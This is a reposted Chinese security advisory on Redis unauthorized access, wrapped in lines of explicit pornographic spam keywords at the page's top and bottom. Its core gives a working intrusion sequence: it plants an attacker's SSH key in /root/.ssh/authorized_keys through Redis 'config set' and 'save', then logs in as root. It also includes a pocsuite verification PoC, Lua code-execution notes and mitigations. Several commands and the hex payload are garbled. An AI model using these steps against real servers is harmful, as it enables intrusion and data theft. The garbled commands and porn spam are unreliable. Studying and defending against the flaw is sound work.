日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > windows >内容正文

windows

Redis 未授权访问缺陷可轻易导致系统被黑

發布時間:2023/12/31 windows 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Redis 未授权访问缺陷可轻易导致系统被黑 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

Redis 未授權訪問缺陷可輕易導致系統被黑

漏洞概要

Redis 默認情況下,會綁定在?0.0.0.0:6379,這樣將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。***者在未授權訪問Redis的情況下可以利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的?/root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器。

漏洞概述

Redis 默認情況下,會綁定在?0.0.0.0:6379,這樣將會將Redis服務暴露到公網上,如果在沒有開啟認證的情況下,可以導致任意用戶在可以訪問目標服務器的情況下未授權訪問Redis以及讀取Redis的數據。***者在未授權訪問Redis的情況下可以利用Redis的相關方法,可以成功將自己的公鑰寫入目標服務器的?/root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器。

漏洞描述

Redis 安全模型的觀念是: “請不要將Redis暴露在公開網絡中, 因為讓不受信任的客戶接觸到Redis是非常危險的” 。

Redis 作者之所以放棄解決未授權訪問導致的不安全性是因為, 99.99%使用Redis的場景都是在沙盒化的環境中, 為了0.01%的可能性增加安全規則的同時也增加了復雜性, 雖然這個問題的并不是不能解決的, 但是這在他的設計哲學中仍是不劃算的。

因為其他受信任用戶需要使用Redis或者因為運維人員的疏忽等原因,部分Redis綁定在0.0.0.0:6379,并且沒有開啟認證(這是Redis的默認配置),如果沒有進行采用相關的策略,比如添加防火墻規則避免其他非信任來源ip訪問等,將會導致Redis服務直接暴露在公網上,導致其他用戶可以直接在非授權情況下直接訪問Redis服務并進行相關操作。

利用Redis自身的相關方法,可以進行寫文件操作,***者可以成功將自己的公鑰寫入目標服務器的 /root/.ssh 文件夾的authotrized_keys 文件中,進而可以直接登錄目標服務器。

漏洞影響

Redis 暴露在公網(即綁定在0.0.0.0:6379,目標IP公網可訪問),并且沒有開啟相關認證和添加相關安全策略情況下可受影響而導致被利用。

通過ZoomEye 的搜索結果顯示,有97700在公網可以直接訪問的Redis服務。

根據 ZoomEye 最新于2015年11月12日0點探測結果顯示:

總的存在無驗證可直接利用 Redis 服務的目標全球有49099,其中中國有16477。其中被明著寫入crackit的,也就是已經被黑的比例分別是全球65%(3.1萬),中國67.5%(1.1萬)。

1.1. ? ?漏洞分析與利用

首先在本地生產公私鑰文件:

Shell

1

$ssh-keygen?–t?rsa

然后將公鑰寫入foo.txt文件

Shell

1

$?(echo?-e?"nn";?cat?id_rsa.pub;?echo?-e?"nn")?>?foo.txt

再連接Redis寫入文件

Shell

1

2

3

4

5

6

$?cat?foo.txt?|?redis-cli?-h?192.168.1.11?-x?set?crackit

$?redis-cli?-h?192.168.1.11

$?192.168.1.11:6379>?config?set?dir?/Users/antirez/.ssh/OK

$?192.168.1.11:6379>?config?get?dir1)?"dir"2)?"/root/.ssh"

$?192.168.1.11:6379>?config?set?dbfilename?"authorized_keys"OK

$?192.168.1.11:6379>?saveOK

這樣就可以成功的將自己的公鑰寫入/root/.ssh文件夾的authotrized_keys文件里,然后***者直接執行:

Shell

1

$?ssh?–i??id_rsa?root@192.168.1.11

即可遠程利用自己的私鑰登錄該服務器。

當然,寫入的目錄不限于/root/.ssh 下的authorized_keys,也可以寫入用戶目錄,不過Redis很多以root權限運行,所以寫入root目錄下,可以跳過猜用戶的步驟。

Redis 未授權的其他危害與利用

數據庫數據泄露

Redis 作為數據庫,保存著各種各樣的數據,如果存在未授權訪問的情況,將會導致數據的泄露,其中包含保存的用戶信息等

代碼執行

Redis可以嵌套Lua腳本的特性將會導致代碼執行, 危害同其他服務器端的代碼執行, 樣例如下

一旦***者能夠在服務器端執行任意代碼, ***方式將會變得多且復雜, 這是非常危險的.

通過Lua代碼***者可以調用 redis.sha1hex() 函數,惡意利用 Redis 服務器進行 SHA-1 的破解。

敏感信息泄露

通過 Redis 的 INFO 命令, 可以查看服務器相關的參數和敏感信息, 為***者的后續***做鋪墊

可以看到泄露了很多 Redis 服務器的信息, 有當前 Redis 版本, 內存運行狀態, 服務端個數等等敏感信息。

全球無驗證可直接利用 Redis 分布情況

全球無驗證可直接利用 Redis TOP 10 國家與地區

漏洞 PoC


Python

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

#!/usr/bin/env?python

#?-*-?coding:utf-8?-*-

import?socket

import?urlparse

from?pocsuite.poc?import?POCBase,?Output

from?pocsuite.utils?import?register

class?TestPOC(POCBase):

????vulID?=?'89339'

????version?=?'1'

????author?=?['Anonymous']

????vulDate?=?'2015-10-26'

????createDate?=?'2015-10-26'

????updateDate?=?'2015-10-26'

????references?=?['http://sebug.net/vuldb/ssvid-89339']

????name?=?'Redis?未授權訪問?PoC'

????appPowerLink?=?'http://redis.io/'

????appName?=?'Redis'

????appVersion?=?'All'

????vulType?=?'Unauthorized?access'

????desc?=?'''

????????redis?默認不需要密碼即可訪問,***直接訪問即可獲取數據庫中所有信息,造成嚴重的信息泄露。

????'''

????samples?=?['']

????def?_verify(self):

????????result?=?{}

????????payload?=?'x2ax31x0dx0ax24x34x0dx0ax69x6ex66x6fx0dx0a'

????????s?=?socket.socket()

????????socket.setdefaulttimeout(10)

????????try:

????????????host?=?urlparse.urlparse(self.url).netloc

????????????port?=?6379

????????????s.connect((host,?port))

????????????s.send(payload)

????????????recvdata?=?s.recv(1024)

????????????if?recvdata?and?'redis_version'?in?recvdata:

????????????????result['VerifyInfo']?=?{}

????????????????result['VerifyInfo']['URL']?=?self.url

????????????????result['VerifyInfo']['Port']?=?port

????????except:

????????????pass

????????s.close()

????????return?self.parse_attack(result)

????def?_attack(self):

????????return?self._verify()

????def?parse_attack(self,?result):

????????output?=?Output(self)

????????if?result:

????????????output.success(result)

????????else:

????????????output.fail('Internet?nothing?returned')

????????return?output

register(TestPOC)


解決方案

臨時解決方案

  • 配置bind選項, 限定可以連接Redis服務器的IP, 并修改redis的默認端口6379.

  • 配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.

  • 配置rename-command CONFIG “RENAME_CONFIG”, 這樣即使存在未授權訪問, 也能夠給***者使用config指令加大難度

  • 好消息是Redis作者表示將會開發”real user”,區分普通用戶和admin權限,普通用戶將會被禁止運行某些命令,如config

  • 官方解決方案

    暫無官方解決方案

    推薦防護方案

    暫無防護方案


    轉載于:https://blog.51cto.com/lwm666/1931125

    總結

    以上是生活随笔為你收集整理的Redis 未授权访问缺陷可轻易导致系统被黑的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 国产免费一区二区三区在线播放 | 日韩欧美国产电影 | 亚洲精品在线观看网站 | www黄色av | 成人在线观看国产 | 黄大色黄大片女爽一次 | 国产精品第7页 | 国产成人精品无码免费看81 | 91免费视频观看 | 成年性生交大片免费看 | 中文字幕一区二区人妻视频 | 精品视频成人 | 午夜剧场免费在线观看 | 天天搞天天搞 | 人妻熟妇又伦精品视频a | 视频一区国产精品 | 日韩欧美亚洲一区 | 欧美一二三级 | 欧美一线高本道 | 国产videos| 大白屁股一区二区视频 | 亚洲国产成人自拍 | 伊人久久综合 | av999 | 人人舔人人 | 黄网免费视频 | av网址免费观看 | 五月综合激情日本mⅴ | 无遮挡aaaaa大片免费看 | 淫视频在线观看 | 国产成人av在线 | 亚洲香蕉在线视频 | 69欧美视频 | av电影在线观看 | 理论片一级 | 黄色午夜视频 | 78m78成人免费网站 | 国产区在线视频 | 欧洲亚洲一区二区三区 | 好吊色欧美一区二区三区视频 | 极品少妇av | 香蕉av一区二区三区 | 狠狠五月婷婷 | 思思久久精品 | 中文字幕av久久爽一区 | 免费看成人毛片 | 精品视频久久久久久久 | 中文字幕一二三区 | 91综合视频 | 毛片基地免费 | 亚洲精品影院在线 | 欧美v日本 | 精品福利影院 | 亚洲一区二区观看播放 | 天天干夜夜做 | 国产做爰xxxⅹ高潮视频12p | 久久蜜桃av| 操你啦影院| 国产草草草 | 亚洲国产成人精品女人久久久 | 国产一区二区视频播放 | 亚洲AV无码成人精品区先锋 | 老外一级片 | 国产免费自拍 | 色综合91 | 蜜桃视频黄色 | 国产第五页 | 成人在线高清 | 亚洲污片 | 国产高清免费在线播放 | 亚洲色图综合 | 老汉色av | 麻豆91茄子在线观看 | 男人天堂网站 | 麻豆精品国产精华精华液好用吗 | 亚洲乱码国产乱码精品天美传媒 | 最近中文字幕免费 | 亚洲精品日产精品乱码不卡 | 欧美理伦少妇2做爰 | av一区二区三区免费观看 | 色香影视 | 成人性生生活性生交全黄 | 人与动物黄色片 | 性淫bbwbbwbbw| 大地资源中文第三页 | 黄色一机片| 日本中文字幕二区 | 国产欧美综合一区二区三区 | 日韩成人av影院 | 午夜久| 秋霞视频在线观看 | 国产精品亚洲自拍 | 免费人成又黄又爽又色 | 人与动物毛片 | 一级视频免费观看 | 久久久www免费人成人片 | y11111少妇 | 精品国产一区二区三区四区阿崩 | 欧美一区二区影院 |